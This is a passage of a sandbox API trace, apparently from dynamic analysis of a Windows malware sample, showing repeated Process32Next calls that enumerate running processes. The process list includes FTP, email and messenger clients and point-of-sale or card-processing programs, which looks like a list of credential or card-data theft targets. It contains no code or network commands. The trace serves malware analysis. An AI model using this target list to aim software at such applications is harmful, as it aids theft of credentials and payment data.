pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.179] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.180] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0188.182] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0188.183] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x33, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0188.185] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0188.187] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.188] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0188.190] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0188.192] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0188.195] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0188.197] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0188.198] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0188.200] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.202] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0188.206] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0188.208] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0188.209] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0188.211] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.251] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0188.253] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0188.254] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0188.256] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0188.257] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0188.259] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="insteadrecent.exe")) returned 1 [0188.260] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="side-end-death.exe")) returned 1 [0188.262] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0188.263] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0188.265] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0188.267] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accept.exe")) returned 1 [0188.269] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0188.271] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0188.272] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0188.273] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0188.275] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0188.277] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0188.278] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0188.280] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0188.281] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0188.283] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0188.284] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0188.335] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0188.338] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0188.340] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0188.342] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0188.344] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0188.346] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0188.348] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0188.352] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0188.354] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0188.356] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0188.358] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0188.360] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0188.362] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0188.364] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0188.365] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0188.367] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0188.369] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0188.417] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0188.420] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0188.422] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0188.424] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0188.426] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0188.428] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0188.430] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0188.432] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0188.433] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0188.435] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0188.440] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0188.442] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0188.443] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0188.445] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0188.447] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0188.449] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0188.451] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0188.453] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0188.492] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0188.495] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0188.497] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0188.498] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0188.500] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0188.502] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0188.503] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0188.505] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 